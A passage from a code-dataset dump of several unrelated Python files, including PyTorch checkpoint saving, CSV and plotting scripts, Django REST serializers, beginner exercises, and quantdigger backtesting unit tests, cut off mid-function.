True:\n logger.info('=> saving checkpoint to {}'.format(final_output_dir))\n # transfer the model to CPU before saving to fix unstable bug:\n # github.com/pytorch/pytorch/issues/10577\n\n model = model.cpu()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'model': cfg.MODEL.NAME,\n 'state_dict': model.state_dict(),\n 'best_state_dict': model.module.state_dict(),\n 'metric': final_metric,\n 'optimizer': optimizer.state_dict(),\n }, best_model, final_output_dir)\n model = model.cuda()\n\n print(\"saving spent time:\")\n end_time = timer(val_time) # timing ends here for \"start_time\" variable\n elif (epoch % 60 == 0) and (epoch != 0):\n logger.info('=> saving epoch {} checkpoint to {}'.format(epoch, final_output_dir))\n # transfer the model to CPU before saving to fix unstable bug:\n # github.com/pytorch/pytorch/issues/10577\n\n time_str = time.strftime('%Y-%m-%d-%H-%M')\n if cfg.TRAIN.HRNET_ONLY:\n checkpoint_filename = 'checkpoint_HRNET_epoch%d_%s.pth' % (epoch, time_str)\n else:\n checkpoint_filename = 'checkpoint_Hybrid_epoch%d_%s.pth' % (epoch, time_str)\n model = model.cpu()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'model': cfg.MODEL.NAME,\n 'state_dict': model.state_dict(),\n 'best_state_dict': model.module.state_dict(),\n 'metric': final_metric,\n 'optimizer': optimizer.state_dict(),\n }, best_model, final_output_dir, checkpoint_filename)\n model = model.cuda()\n\n # xiaofeng change\n time_str = time.strftime('%Y-%m-%d-%H-%M')\n if cfg.TRAIN.HRNET_ONLY:\n model_name = 'final_state_HRNET_%s.pth' % (time_str)\n else:\n model_name = 'final_state_Hybrid_%s.pth' % (time_str)\n\n final_model_state_file = os.path.join(final_output_dir, model_name)\n logger.info('=> saving final model state to {}'.format(final_model_state_file))\n torch.save(model.module.state_dict(), final_model_state_file)\n writer_dict['writer'].close()\n\n # save a final checkpoint\n model = model.cpu()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'model': cfg.MODEL.NAME,\n 'state_dict': model.state_dict(),\n 'best_state_dict': model.module.state_dict(),\n 'metric': final_metric,\n 'optimizer': optimizer.state_dict(),\n }, best_model, final_output_dir, \"checkpoint_final_state.pth\")\n # model = model.cuda()\n\n\nif __name__ == '__main__':\n main()\n print(\"Refuge Fovea Train Program Exit ... 
\\n\")","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"460858738","text":"#!/usr/bin/python3\n\nfrom pathlib import Path\n\nimport argparse\nimport csv\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"histogram\", help='input histogram folder')\nargs = parser.parse_args()\n\nhistogram = Path(args.histogram)\nplot_folder = Path('.')\n\nhistograms = list(histogram.glob('**/*.pcap.hist-filtered.csv'))\nfor hist in histograms:\n\n filname = hist.stem.replace('.hist-filtered', '.hist-filtered.cdf')\n #print(filname)\n\n with open(hist, newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(spamreader)\n total = 0\n for row in spamreader:\n total += int(row[1])\n\n with open(hist, newline='') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n next(spamreader)\n with open(plot_folder.joinpath(filname + '.csv'), 'w', newline='') as csvfile:\n \n spamwriter = csv.writer(csvfile, delimiter=';', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n integrator = 0\n for row in spamreader:\n integrator += int(row[1])\n if (1 - (float(integrator)/total)) > 0.0:\n magic = 1 / (1 - float(integrator)/total)\n spamwriter.writerow([str(row[0]), str(magic), str(integrator), str('{:.20f}'.format(float(integrator)/total))])\n else:\n # maximum measured value not plottable on log scale\n\t\t # => shift it to the non-printed area of the graph\n magic = 1 / (1 - (float(integrator) - 0.000001)/total)\n spamwriter.writerow([str(row[0]), str(magic), str(integrator), str('{:.20f}'.format(float(integrator)/total))])\n","sub_path":"scripts/hdrplot.py","file_name":"hdrplot.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"168506959","text":"\"\"\"Crie um programa que leia a idade e o sexo de várias pessoas.A cada pessoa\r\ncadastrada, o programa deverá perguntar se o usuário quer ou não continuar.\r\nNo final, mostre:\r\nA) quantas pessoas tem mais de 18 anos.\r\nB) quantos homens foram cadastrados.\r\nC) Quantas mulheres tem menos de 20 anos\"\"\"\r\n\r\ntot18 = homem = totm20 = 0\r\nwhile True:\r\n print('=' * 20)\r\n print('CADASTRO DE PESSOA')\r\n print('=' * 20)\r\n idade = int(input('Idade: ').strip())\r\n sexo = ' '\r\n while sexo not in 'MF':\r\n sexo = str(input('Sexo [M/F]: ').strip()).upper()[0]\r\n\r\n if idade > 18:\r\n tot18 += 1\r\n if sexo == 'M':\r\n homem += 1\r\n if sexo == 'F' and idade < 20:\r\n totm20 += 1\r\n\r\n continua = ' '\r\n while continua not in 'SN':\r\n continua = str(input('Quer continuar [S/N]? 
').strip()).upper()[0]\r\n if continua == 'N':\r\n break\r\nprint('FIM DO PROGRAMA')\r\nprint(f'Total de PESSOAS com mais de 18 anos: {tot18}')\r\nprint(f'Total de HOMENS cadastrados: {homem}')\r\nprint(f'Total de MULHERES com menos de 20 anos: {totm20}')","sub_path":"ex069.py","file_name":"ex069.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135373016","text":"\n\nimport argparse\n#import pickle\n#import scipy\n#from scipy.stats import norm\nimport numpy\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import matplotlib.mlab as mlab\n#==========load txt file\n\nx = []\nrms = []\nRMSE = []\ny = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nR_input=[0.8300, 0.8300, 0.8300, 0.8628, 0.8682, 0.8965, 0.8500, 0.8868, 0.8792]\nj = 1\nM = 10\nwhile j< M:\n l = str(j)\n #data1 = numpy.loadtxt('../fit_PRad/fit_result/CF4_Model_' + l +'_1e4.txt', float)#load the fitted radius\n #data1 = numpy.loadtxt('../fit/loop_9models_roofit/roofit_result_PRad_range/R12_Model' + l +'_1e4.txt', float)#load the fitted radius\n data1 = numpy.loadtxt('../fit/loop_9models/fit_result/R12_Cut01GeV_Model' + l +'_1e4.txt', float)#load the fitted radius\n #data1 = numpy.loadtxt('../PRadII_rebin/fit/fit_result/R11_PRadII_Model' + l +'_1e4.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/poly10_xsfit_RE_GMfromRatio_check_Model' + l +'.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/R11_xsfit_RE_GMisDipole_1GeV_1e3_Model' + l +'.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/R11_xsfit_RE_GMfromRatio_Model' + l +'.txt', float)\n #data1 = numpy.loadtxt('../global_fit_new/result/R11_xsfit_RE_GMRandom_Model' + l +'.txt', float)\n #radius = data1[:]\n #chi2 = data1[0,:]\n r = data1[:]\n i = 0\n radius = []\n while (i<10000):\n #while (i0.70 and r[i]<1.0):\n #if (r[i]>0.72 and r[i]<0.98):\n radius.append(r[i])\n i += 1\n R_mean = numpy.mean(radius)\n R_rms = numpy.std(radius)\n x.append(R_mean-R_input[j-1])\n rms.append(R_rms)\n RMSE.append(numpy.sqrt((R_mean-R_input[j-1])**2+R_rms**2))\n j += 1\nprint(i)\nprint(x)\nprint(rms)\n#print(numpy.mean(numpy.absolute(x)))\n#print(numpy.mean(rms))\n#print(numpy.mean(RMSE))\ni = 0\nN = 7\nsum_bias = 0.0\nsum_rms = 0.0\nsum_RMSE = 0.0\nwhile i<7:\n sum_bias = sum_bias + numpy.absolute(x[i])\n sum_rms = sum_rms + rms[i]\n sum_RMSE = sum_RMSE + RMSE[i]\n i += 1\nprint(sum_bias/7)\nprint(sum_rms/7)\nprint(sum_RMSE/7)\n#plt.figure(figsize=(3.5,5.5))\nplt.figure(figsize=(3.0,4.5))\n#plt.figure(figsize=(4.0,5.5))\n#fig = plt.Figure()\nax = plt.gca()\nax.xaxis.label.set_size(15)\n#plt.xlim((-0.1,0.1))\nplt.xlim((-0.08,0.08))\n#plt.xlim((-0.05,0.05))\n#plt.xlim((-0.16,0.16))\n#plt.ylim((0.5,7.5))\nplt.ylim((0.5,9.5))\nplt.grid(True)\nplt.xlabel(r'$\\delta R / fm$',fontsize=15)\n#plt.xticks([-0.12, -0.08, -0.04, 0, 0.04, 0.08, 0.12])\n#plt.xticks([-0.04, -0.02, 0, 0.02, 0.04])\n#plt.xticks([-0.04, -0.02, 0, 0.02, 0.04])\n#plt.xticks([-0.1, -0.05, 0, 0.05, 0.1])\n#plt.xticks([-0.2, -0.1, 0, 0.1, 0.2])\n#plt.xticks([-0.5, -0.25, 0, 0.25, 0.5])\nplt.yticks([])\n\n#y1 = np.linspace(0.5,7.5)\ny1 = np.linspace(0.5,9.5)\nx1 = y1-y1 \nplt.plot(x1,y1,linestyle=(0, (5, 5)),color='black')\n\n\n\n\nplt.title('CF (3)',loc='center', fontsize=15)\n#plt.title('PolynomialZ (3)',loc='center', fontsize=15)\n#plt.title('Rational (1,1)',loc='center', fontsize=15)\n#plt.title('Gaussian',loc='center', fontsize=15)\n\n#plt.title('Gaussian',loc='center',fontdict={'fontsize': 20, 
'fontweight': 'medium'})\nplt.errorbar(x[0], y[0], xerr=rms[0], fmt ='o',color='black')#, color = 'r.')\nplt.errorbar(x[1], y[1], xerr=rms[1], fmt ='o',color='grey')#, color = 'b.')\nplt.errorbar(x[2], y[2], xerr=rms[2], fmt ='or')#, color = 'g.')\nplt.errorbar(x[3], y[3], xerr=rms[3], fmt ='o',color='salmon')#, color = 'k.')\nplt.errorbar(x[4], y[4], xerr=rms[4], fmt ='o',color='blue')#, color = 'm.')\nplt.errorbar(x[5], y[5], xerr=rms[5], fmt ='o',color='cornflowerblue')#, color = 'olive')\nplt.errorbar(x[6], y[6], xerr=rms[6], fmt ='o',color='magenta')#, color = 'brown')\nplt.errorbar(x[7], y[7], xerr=rms[7], fmt ='o',color='violet')#, color = 'teal')\nplt.errorbar(x[8], y[8], xerr=rms[8], fmt ='o',color='green')#, color = 'orange')\n#plt.errorbar(x[9], y[9], xerr=rms[9], fmt ='o')#, color = 'orange')\n\n\nplt.savefig(\"mygraph.png\")\n","sub_path":"analysis/count_draw.py","file_name":"count_draw.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"256833953","text":"# saves and reads our lists and dictionaries to files\n# for reference and speed up\n\nimport pickle\n\n# takes a list of posts and writes them to a file for reference\ndef write_list(file_name,text_list):\n\n    f = open(file_name,'wb')\n    for post in text_list:\n        post_str = post+\"\\n\\n\"\n        f.write(post_str.encode(\"utf8\"))\n    f.close()\n\n# takes an object and pickles it into a file for later use\ndef write_obj(file_name,obj):\n\n    f = open(file_name,'wb')\n    pickle.dump(obj,f)\n    f.close()\n\n# takes a pickled file and reads it into a variable\ndef read_obj(file_name):\n\n    f = open(file_name,'rb')\n    obj = pickle.load(f)\n    f.close()\n    return obj\n","sub_path":"files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"369430892","text":"from rest_framework import serializers\n\nfrom papermerge.core.models import (Document, User)\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n    documents = serializers.PrimaryKeyRelatedField(\n        many=True, queryset=Document.objects.all()\n    )\n\n    class Meta:\n        model = User\n        fields = ['id', 'username', 'documents']\n\n\nclass DocumentSerializer(serializers.Serializer):\n    id = serializers.IntegerField(read_only=True)\n    title = serializers.CharField(\n        required=False,\n        allow_blank=True,\n        max_length=100\n    )\n    notes = serializers.CharField(\n        required=False,\n        allow_blank=True,\n        allow_null=True,\n        max_length=100\n    )\n    page_count = serializers.IntegerField(\n        read_only=True\n    )\n\n    user = serializers.ReadOnlyField(source='user.username')\n\n    def update(self, instance, validated_data):\n        \"\"\"\n        Update and return an existing `Document` instance,\n        given the validated data.\n        \"\"\"\n        instance.title = validated_data.get('title', instance.title)\n        instance.notes = validated_data.get('notes', instance.notes)\n        instance.save()\n\n        return instance\n\n    def create(self, validated_data):\n        \"\"\"\n        Create and return a new `Document` instance, given the validated data.\n        \"\"\"\n        return Document.objects.create(**validated_data)\n","sub_path":"papermerge/core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"16548397","text":"file = open('znaki.txt', 'r')\nx = file.read().split('\\n')\nslowo = ''\nlista= []\nilosc = 0\nfor i in range (len(x)):\n    for j 
in range(int(len(x[i])-1), -1, -1):\n        slowo += x[i][j]\n    lista.append(slowo)\n    slowo = ''\n    if x[i] == lista[i]:\n        ilosc += 1\n        with open('palindrom.txt', 'a') as palidrom:\n            palidrom.write(x[i] + '\\n')\nfile.close()\nprint(\"palindromow jest: \", ilosc)","sub_path":"lab12/cw_08.py","file_name":"cw_08.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426118383","text":"# encoding: utf-8\n\nimport os\nimport torch\n\n# print(os.getcwd())\n# import sys\n# print(sys.path)\n\nfrom model import BERTClass\n\n# import torch\n# import transformers\n\n\n# class BERTClass(torch.nn.Module):\n# \n#     def __init__(self):\n#         super(BERTClass, self).__init__()\n#         self.l1 = transformers.BertModel.from_pretrained(model_name)\n#         self.l2 = torch.nn.Dropout(0.3)\n#         self.l3 = torch.nn.Linear(768, len(mlb.classes_))\n# \n# \n#     def forward(self, ids, mask, token_type_ids):\n#         output_1 = self.l1(ids, attention_mask = mask, token_type_ids = token_type_ids)\n#         output_2 = self.l2(output_1.pooler_output)\n#         output = self.l3(output_2)\n#         return output\n\n\npath = os.path.dirname(__file__)\n\nmodel_file = os.path.join(path, 'model/chinese-bert-wwm-ext-4.bin')\nmodel = torch.load(model_file)\nmodel.to('cpu')\n\n\n# output_model_file = os.path.splitext(model_file)[0] + '-cpu.bin'\n# torch.save(model, output_model_file)\n\noutput_model_file = os.path.splitext(model_file)[0] + '-cpu.sd'\ntorch.save(model.state_dict(), output_model_file)\n\nprint('saved')\n","sub_path":"topic_modeling/model_convert.py","file_name":"model_convert.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"519094079","text":"# -*- coding: utf-8 -*-\n##\n# @file test_blotter.py\n# @brief 测试模拟器的价格撮合, 当前持仓,权益,可用资金等。\n# @author wondereamer\n# @version 0.3\n# @date 2015-12-22\n\n\nimport datetime\nimport unittest\nimport pandas as pd\nimport os\nimport talib\nimport numpy as np\nfrom logbook import Logger\nfrom quantdigger.engine.qd import *\nfrom quantdigger.engine.series import NumberSeries, DateTimeSeries\n\nlogger = Logger('test')\nwindow_size = 0\nCAPTIAL = 200000\nOFFSET = 0.6\nbuy1 = datetime.datetime.strptime(\"09:01:00\", \"%H:%M:%S\").time()\nbuy2 = datetime.datetime.strptime(\"09:02:00\", \"%H:%M:%S\").time()\nbuy3 = datetime.datetime.strptime(\"09:03:00\", \"%H:%M:%S\").time()\nsell1 = datetime.datetime.strptime(\"14:57:00\", \"%H:%M:%S\").time()\nsell2 = datetime.datetime.strptime(\"14:58:00\", \"%H:%M:%S\").time()\nsell3 = datetime.datetime.strptime(\"15:00:00\", \"%H:%M:%S\").time()\n\n\nclass TestOneDataOneCombination(unittest.TestCase):\n    \"\"\" 测试单数据单组合的价格撮合,持仓,可用资金等交易接口 \"\"\"\n    \n    def test_case(self):\n        # @todo profile\n        #signals 盈利\n\n        # @TODO deals DemoStrategy2\n        cashes0, cashes1 = [], []\n\n        class DemoStrategy1(Strategy):\n            \"\"\" 只买多头仓位的策略 \"\"\"\n            \n            def on_init(self, ctx):\n                \"\"\"初始化数据\"\"\" \n                pass\n\n            def on_bar(self, ctx):\n                curtime = ctx.datetime[0].time()\n                if curtime in [buy1, buy2, buy3]:\n                    ctx.buy(ctx.close, 1) \n                else:\n                    if curtime == sell1:\n                        assert(ctx.position() == 3 and '持仓测试失败!')\n                        ctx.sell(ctx.close, 2) \n                    elif curtime == sell2:\n                        assert(ctx.position() == 1 and '持仓测试失败!')\n                        ctx.sell(ctx.close, 1) \n                ## @note 前一根的交易信号在当前价格撮合后的可用资金\n                cashes0.append(ctx.test_cash()) \n\n\n        class DemoStrategy2(Strategy):\n            \"\"\" 买多卖空的策略 \"\"\"\n            \n            def on_init(self, ctx):\n                \"\"\"初始化数据\"\"\" \n                pass\n\n            def on_bar(self, ctx):\n                curtime = 
ctx.datetime[0].time()\n if curtime in [buy1, buy2, buy3]:\n ctx.buy(ctx.close, 1) \n ctx.short(ctx.close, 2) \n else:\n if curtime == sell1:\n assert(ctx.position('long') == 3 and '持仓测试失败!')\n ctx.sell(ctx.close, 2) \n assert(ctx.position('short') == 6 and '持仓测试失败!')\n ctx.cover(ctx.close, 4) \n elif curtime == sell2:\n assert(ctx.position('long') == 1 and '持仓测试失败!')\n ctx.sell(ctx.close, 1) \n assert(ctx.position('short') == 2 and '持仓测试失败!')\n ctx.cover(ctx.close, 2) \n cashes1.append(ctx.test_cash()) \n\n set_symbols(['blotter.SHFE-1.Minute'], window_size)\n profile = add_strategy([DemoStrategy1('A1'), DemoStrategy2('A2')], {\n 'captial': CAPTIAL,\n 'ratio': [0.5, 0.5]\n })\n run()\n # all_holding\n fname = os.path.join(os.getcwd(), 'data', 'blotter.SHFE-1.Minute.csv')\n source = pd.read_csv(fname, parse_dates=True, index_col=0)\n self.assertTrue(len(source) > 0 and \n len(source) == len(profile.all_holdings(0)), '模拟器测试失败!')\n self.assertTrue(len(source) > 0 and \n len(source) == len(profile.all_holdings(1)), '模拟器测试失败!')\n # cash()\n target, cashes, dts = target_all_holding1(source, CAPTIAL/2)\n for i in range(0, len(cashes0)-1): # 最后一根强平了无法比较\n self.assertTrue(np.isclose(cashes0[i],cashes[i]), 'cash接口测试失败!')\n self.assertTrue(len(cashes0) == len(cashes), 'cash接口测试失败!')\n self.assertTrue(len(profile.all_holdings(0)) == len(target) and\n len(target) > 0, 'all_holdings接口测试失败!')\n\n for i, hd in enumerate(profile.all_holdings(0)):\n self.assertTrue(hd['datetime'] == dts[i], 'all_holdings接口测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), 'all_holdings接口测试失败!')\n\n target2, cashes, dts = target_all_holding2(source, CAPTIAL/2)\n self.assertTrue(len(profile.all_holdings(1)) == len(target2) and \n len(target2) > 0, 'all_holdings接口测试失败!')\n for i in range(0, len(cashes1)-1): # 最后一根强平了无法比较\n self.assertTrue(np.isclose(cashes1[i],cashes[i]), 'cash接口测试失败!')\n self.assertTrue(len(cashes1) == len(cashes), 'cash接口测试失败!')\n for i, hd in enumerate(profile.all_holdings(1)):\n self.assertTrue(np.isclose(target[i]-CAPTIAL/2,\n 0-(target2[i]-CAPTIAL/2)), '测试代码错误!')\n self.assertTrue(hd['datetime'] == dts[i], 'all_holdings接口测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target2[i]), 'all_holdings接口测试失败!')\n #\n hd0 = profile.holding(0) \n hd1 = profile.holding(1) \n hd = profile.holding()\n self.assertTrue(hd0['equity']+hd1['equity']==hd['equity'], 'holdings接口测试失败!')\n self.assertTrue(hd0['cash']+hd1['cash']==hd['cash'], 'holdings接口测试失败!')\n self.assertTrue(hd0['commission']+hd1['commission']==hd['commission'], 'holdings接口测试失败!')\n self.assertTrue(hd0['history_profit']+hd1['history_profit']==hd['history_profit'], 'holdings接口测试失败!')\n hd0last = profile.all_holdings(0)[-1]\n self.assertTrue(hd0last['equity'] == hd0['equity'], 'holdings接口测试失败!')\n self.assertTrue(hd0last['cash'] == hd0['cash'], 'holdings接口测试失败!')\n self.assertTrue(hd0last['commission'] == hd0['commission'], 'holdings接口测试失败!')\n self.assertTrue(len(profile.all_holdings()) == len(target) and\n len(target) > 0, 'holdings接口测试失败!')\n #\n ## @TODO \n all_holdings = profile.all_holdings()\n all_holdings0 = profile.all_holdings(0)\n all_holdings1 = profile.all_holdings(1)\n for i in range(0, len(profile.all_holdings())):\n hd = all_holdings[i]\n hd0 = all_holdings0[i]\n hd1 = all_holdings1[i]\n self.assertTrue(hd['cash'] == hd0['cash'] + hd1['cash'] , 'all_holdings接口测试失败!')\n self.assertTrue(hd['commission'] == hd0['commission'] +\n hd1['commission'], 'all_holdings接口测试失败!')\n self.assertTrue(hd['equity'] == hd0['equity'] + 
hd1['equity'], 'all_holdings接口测试失败!')\n \n ## 绘制k线,交易信号线\n #from quantdigger.digger import finance, plotting\n #plotting.plot_strategy(profile.data(), deals=profile.deals(1))\n\n\n def test_case2(self):\n \"\"\" 测试限价的延迟成交 \"\"\"\n buy_entries, sell_entries = [], []\n short_entries, cover_entries = [], []\n\n class DemoStrategyBuy(Strategy):\n \"\"\" 只开多头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0] in buy_entries:\n ctx.buy(ctx.low-OFFSET, 1) \n # 默认多头\n elif ctx.position() > 0 and ctx.datetime[0].time() == sell1:\n ctx.sell(ctx.close, ctx.position()) \n\n class DemoStrategyShort(Strategy):\n \"\"\" 只开空头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0] in short_entries:\n ctx.short(ctx.high+OFFSET, 1) \n elif ctx.position('short') > 0 and ctx.datetime[0].time() == sell1:\n ctx.cover(ctx.close, ctx.position('short')) \n\n class DemoStrategySell(Strategy):\n \"\"\" 只开多头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0].time() == buy1:\n ctx.buy(ctx.close, 1) \n elif ctx.position('long') > 0 and ctx.datetime[0] in sell_entries:\n ctx.sell(ctx.high+OFFSET, ctx.position()) \n ## @TODO 隔夜测试\n elif ctx.position('long') > 0 and ctx.datetime[0].time() == sell3:\n ctx.sell(ctx.close, ctx.position()) \n\n class DemoStrategyCover(Strategy):\n \"\"\" 只买多头仓位的策略 \"\"\"\n \n def on_init(self, ctx):\n \"\"\"初始化数据\"\"\" \n pass\n\n def on_bar(self, ctx):\n if ctx.datetime[0].time() == buy1:\n ctx.short(ctx.close, 1) \n elif ctx.position('short') > 0 and ctx.datetime[0] in cover_entries:\n ctx.cover(ctx.low-OFFSET, ctx.position('short')) \n elif ctx.position('short') > 0 and ctx.datetime[0].time() == sell3:\n ctx.cover(ctx.close, ctx.position('short')) \n\n set_symbols(['blotter.SHFE-1.Minute'], window_size)\n profile = add_strategy([DemoStrategyBuy('A1'), DemoStrategySell('A2'),\n DemoStrategyShort('A3'), DemoStrategyCover('A4')],{\n 'captial': CAPTIAL,\n 'ratio': [0.25, 0.25, 0.25, 0.25]\n })\n\n fname = os.path.join(os.getcwd(), 'data', 'blotter.SHFE-1.Minute.csv')\n source = pd.read_csv(fname, parse_dates=True, index_col=0)\n buy_entries, sell_entries, short_entries, cover_entries = findTradingPoint(source)\n run()\n # buy\n target, dts = target_all_holding_buy(source, buy_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(0)) == len(target) and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(0)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n # short\n target, dts = target_all_holding_short(source, short_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(2)) == len(target) and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(2)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n # sell\n target, dts = target_all_holding_sell(source, sell_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(1)) == len(target) and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(1)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n\n # cover\n target, dts = target_all_holding_cover(source, cover_entries, CAPTIAL/4)\n self.assertTrue(len(profile.all_holdings(3)) == len(target) 
and\n len(target) > 0, '模拟器测试失败!')\n for i, hd in enumerate(profile.all_holdings(3)):\n self.assertTrue(hd['datetime'] == dts[i], '模拟器测试失败!')\n self.assertTrue(np.isclose(hd['equity'], target[i]), '模拟器测试失败!')\n\n #from quantdigger.digger import plotting\n #plotting.plot_strategy(profile.data(), deals=profile.deals(3))\n\n ## @TODO 模拟器make_market的运行次数\n ## @TODO 跨日订单的清空\n return\n\ndef target_all_holding1(data, captial):\n buy_prices= []\n close_profit = 0\n equities = [] # 累计平仓盈亏\n dts = []\n cashes = []\n for dt, price in data.close.iteritems():\n curtime = dt.time()\n if curtime in [buy1, buy2, buy3]:\n buy_prices.append(price)\n else:\n if curtime == sell1:\n assert(len(buy_prices) == 3)\n profit = (price-buy_prices[0]) + (price-buy_prices[1])\n close_profit += profit\n buy_prices = buy_prices[-1:]\n elif curtime == sell2:\n assert(len(buy_prices) == 1)\n close_profit += (price - buy_prices[0])\n buy_prices = []\n if dt == data.index[-1]:\n # 强平现有持仓\n for bp in buy_prices:\n close_profit += (price - bp)\n buy_prices = []\n pos_profit = sum([price-pos_price for pos_price in buy_prices]) # 持仓盈亏\n #cost = sum(buy_prices) # 股票持仓成本\n cost = price * len(buy_prices) * 1 # 保证金为比例为1的期货持仓成本。\n equities.append(captial+close_profit+pos_profit)\n cashes.append(equities[-1]-cost)\n dts.append(dt)\n return equities, cashes, dts\n\ndef target_all_holding2(data, captial):\n buy_prices= []\n short_prices = []\n close_profit = 0\n equities = [] # 累计平仓盈亏\n dts = []\n cashes = []\n for dt, price in data.close.iteritems():\n curtime = dt.time()\n if curtime in [buy1, buy2, buy3]:\n buy_prices.append(price)\n short_prices.append(price)\n short_prices.append(price)\n else:\n if curtime == sell1:\n assert(len(buy_prices) == 3)\n profit = (price-buy_prices[0]) + (price-buy_prices[1])\n close_profit += profit\n buy_prices = buy_prices[-1:]\n assert(len(short_prices) == 6)\n profit = (price-short_prices[0]) + (price-short_prices[1]) + \\\n (price-short_prices[2]) + (price-short_prices[3])\n close_profit -= profit\n short_prices = short_prices[-2:]\n elif curtime == sell2:\n assert(len(buy_prices) == 1)\n close_profit += (price - buy_prices[0])\n buy_prices = []\n assert(len(short_prices) == 2)\n close_profit -= (price - short_prices[0])\n close_profit -= (price - short_prices[1])\n buy_prices = []\n short_prices = []\n if dt == data.index[-1]:\n # 强平现有持仓\n for bp in buy_prices:\n close_profit += (price - bp)\n for bp in short_prices:\n close_profit -= (price - bp)\n buy_prices = []\n short_prices = []\n pos_profit = sum([price-pos_price for pos_price in buy_prices]) # 持仓盈亏\n pos_profit -= sum([price-pos_price for pos_price in short_prices]) # 持仓盈亏\n equities.append(captial+close_profit+pos_profit)\n ## @TODO 股票测试\n cost = price * len(buy_prices) * 1 # 保证金为比例为1的期货持仓成本。\n cost += price * len(short_prices) * 1 \n cashes.append(equities[-1]-cost)\n dts.append(dt)\n return equities, cashes, dts\n\n\ndef findTradingPoint(data):\n buy_entries = []\n sell_entries = []\n short_entries = []\n cover_entries = []\n prehigh = data.high[0]\n predt = data.index[0]\n prelow = data.low[0]\n\n for dt, low in data.low.iteritems():\n if dt.date() == predt.date() and dt.time() < sell1 and prelow - low >= OFFSET:\n buy_entries.append(predt)\n prelow = low\n predt = dt\n\n for dt, high in data.high.iteritems():\n if dt.date() == predt.date() and dt.time() < sell1 and high - prehigh >= OFFSET:\n short_entries.append(predt)\n #print predt, low-prelow\n prehigh = high\n predt = dt\n\n for dt, high in data.high.iteritems():\n if dt.time() > 
buy3 and high - prehigh >= OFFSET:\n sell_entries.append(predt)\n #print predt, high-prehigh\n prehigh = high\n predt = dt\n\n for dt, low in data.low.iteritems():\n if dt.time() > buy3 and prelow - low >= OFFSET:\n cover_entries.append(predt)\n #print predt, low-prelow\n prelow = low\n predt = dt\n return buy_entries, sell_entries, short_entries, cover_entries\n\ndef target_all_holding_buy(data, buy_entries, captial):\n \"\"\" 返回策略多头限价开仓超过当前bar价格范围的历史资金状况 \"\"\" \n buy_prices= []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n prelow = data.low[0]\n trans_entries = map(lambda x: x+datetime.timedelta(minutes = 1), buy_entries)\n for dt, low in data.low.iteritems():\n curtime = dt.time()\n close = data.close[dt]\n if dt in trans_entries:\n buy_prices.append(prelow-OFFSET)\n elif curtime == sell1:\n for bprice in buy_prices:\n close_profit += (close-bprice)\n buy_prices = buy_prices[-1:]\n buy_prices = []\n elif dt == data.index[-1]:\n # 最后一根,强平现有持仓\n for bp in buy_prices:\n close_profit += (close - bp)\n buy_prices = []\n pos_profit = 0 # 持仓盈亏\n for pos_price in buy_prices:\n pos_profit += (close - pos_price)\n equities.append(close_profit+pos_profit+captial)\n dts.append(dt)\n prelow = low\n return equities, dts\n\ndef target_all_holding_short(data, buy_entries, captial):\n \"\"\" 返回策略空头限价开仓超过当前bar价格范围的历史资金状况 \"\"\" \n buy_prices= []\n close_profit = 0 # 累计平仓盈亏\n equities = [] \n dts = []\n prehigh = data.high[0]\n 